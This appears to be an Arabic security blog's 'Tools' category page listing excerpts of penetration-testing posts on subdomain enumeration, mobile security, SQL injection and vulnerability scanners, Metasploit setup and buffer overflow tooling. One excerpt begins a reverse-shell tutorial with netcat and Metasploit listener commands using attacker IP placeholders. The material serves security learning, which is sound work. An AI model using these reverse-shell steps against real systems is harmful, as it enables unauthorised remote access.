RSSمحتويات التصنيف: "أدوات"

post thumbnail

أداة Sublist3r للبحث عن الدومينات الفرعية في محركات البحث

من أهم مراحل عملية إختبار الاختراق هي عملية جمع المعلومات عن الهدف , فمختبر الاختراق المحترف هو من يقوم بإجادة هذة المرحلة و يقوم بجمع المعلومات عن الهدف بشكل دقيق حتى يستطيع ان يقوم بإختراقه بعد ذلك بنجاح . و من مراحل جمع المعلومات هي تحديد الدومنيات الفرعية الخاصة بالهدف , مثلا اذا كان الهدف […]

post thumbnail

أمن تطبيقات الهواتف المحمولة

كل برنامج يحتاج إلى صلاحيات حسب وظيفة هذا البرنامج يسهلها له نظام التشغيل. مثلا برنامج سكايب الذي يستخدم في الاتصالات الهاتفية سوف يحتاج الى المايكروفون والى الكاميرا الى غير ذلك من الصلاحيات. في حين ان لعبة ما قد تحتاج الى صلاحيات الوصول الى الانترنت من أجل متابعة أداء اللاعبين ونقاطهم ومراحل تقدمهم فيها.

post thumbnail

أمن الهواتف الذكيّة

الهواتف النّقالة، ولاسيما الذكيّة منها هي عبارة عن حواسيب محمولة. فهي تسمح لك بالوصول الى الانترنت والى بريدك الالكتروني، كذلك تسمح لك بتحميل التطبيقات والألعاب وتخزن معلوماتك الشخصية، الأشخاص الذين تتصل به، صورك وغيرها. لهذا أنت تحتاج الى تقوم بحماية هاتفك تماماً مثلما تقوم بحماية حاسوبك المنزلي او المحمول. تذكر دائماً أنّ هاتف ليس مجرد هاتف لذلك تأكد دائماً من انه معك في كل الأوقات.

post thumbnail

إطلاق أداة WebPwn3r لفحص المواقع من الثغرات الخطيرة.

يسرنا اليوم أن نتحدث عن إطلاق أداة WebPwn3r لفحص المواقع من الثغرات الخطيرة والتي صممت خصيصا لمساعدة الباحثين الأمنين الذين يشاركون في مسابقات اكتشاف الثغرات التي تسمي ب Bug Bounty Programs دعونا نشرح الأداة وطريقة عملها .. الأداة تم برمجتها بلغة البايثون لتقوم بفحص المواقع من ثغرات Remote Code Injection و Remote Code Execution و […]

post thumbnail

إطلاق برنامج Sculptor لحقن قواعد البيانات وبمميزات رائعة.

قبل البداية بكتابة المقال يسعدني القول بأن البرنامج من برمجة عربية مائة بالمائة ويتم تطويرة وتحديثة بشكل مستمر. إسم البرنامج: Sculptor إسم المبرمج: Mohamed Maati الموقع الرسمي: http://sculptordev.com برنامج Sculptor او ما يطلق عليه برنامج النحات باللغة العربية. يساعد البرنامج مختبري الاختراق في اكتشاف واستغلال الثغرات من نوع SQL Injection ويجب التنبيه إلي ان البرنامج […]

post thumbnail

إعداد Metasploit مع قاعدة البيانات Postgress على Kali

أصبحت الأمور أكثر استقرارا و أكثر سهولة في Kali. في هذا الموضوع السريع سنضع طريقة ربط مشروع Metasploit بقاعدة بيانات PostGres لتسريع عملية تشغيل الميتاسبلويت وعملية البحث فيها. 1. تشغيل الخدمات service postgresql start service metasploit start – لتشغيل الخدمات تلقائيا بعد إعادة تشغيل النظام update-rc.d postgresql enable update-rc.d metasploit enable   2. تشغيل مشروع […]

post thumbnail

إضافات Firefox مميزة لمختبري الإختراق

متصفح Firefox هو واحد من أشهر متصفحات الإنترنت و يتم الإعتماد عليه من قبل الكثير من المستخدمين حول العالم و اهم ما يميز متصفح فايرفوكس انه يدعم نظام الإضافات ( Addons ) حيث يتوفر له الآلاف من الأضافات المجانية التي تساعد و تعزز من اداء المتصفح و إمكانياته بشكل كبير ,كما ان المتصفح يستخدمه الكثير […]

post thumbnail

انشاء اتصال عكسي من سطر واحد وبعدة لغات

[toc]   هذه معاني المتغيرات التي ستجدها في الشرح. استبدلها عند التطبيق. $ATTCKER_IP: هو عنواد المهاجم $ATTACKER_PORT: هو المنفذ الذي ينصت عليه الضحية $VICTIM_IP: هو عنواد المهاجم $VICTIM_PORT: هو المنفذ الذي ينصت عليه الضحية Listining تستطيع الإنصات بأي طريقة تحبها – NetCat nc -lvp $ATTACKER_PORT أو ncat -lvp $ATTACKER_PORT – Metasploit ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=$ATTCKER_IP […]

post thumbnail

Buffer Overflow tutorial – Part 1: Tools

[toc]     مقدمة سأسرد لكم بعض أهم الأدوات المستخدمة في عملية اكتشاف وكتابة استغلال ثغرات الـ Buffer Overflow. بالطبع هذه الأدوات ليست الوحيدة ولكنها الأشمل والأشهر. إذا رأيت أن هناك أداة مهمة تستحق أن تضاف إلى هذه القائمة الرجاء ذكرها في التعليقات.   تثبيت Ruby 1.9.3 على أوبونتو تثبيت Ruby 1.9.3 على أوبونتو apt-get […]

post thumbnail

الأداة Buffer Overflow Kit

مقدمة عندما بدأت أتعلم Buffer Overflow  اضطررت لاستخدام أدوات مختلفة من أماكن مختلفة, منها ماهو موجوده في الـ Metasploit ومنها ماهو من خارجها ومنها ماتمنيت أن تكون موجودة. فكرت مؤخرا أن أقوم بعمل أداة تجمع معظم الأدوات التي كنت أستخدمها في مكان واحد وإعادة كتابتها من البداية كي أستفيد وأتعلم كيفية بناء مثل تلك الأدوات […]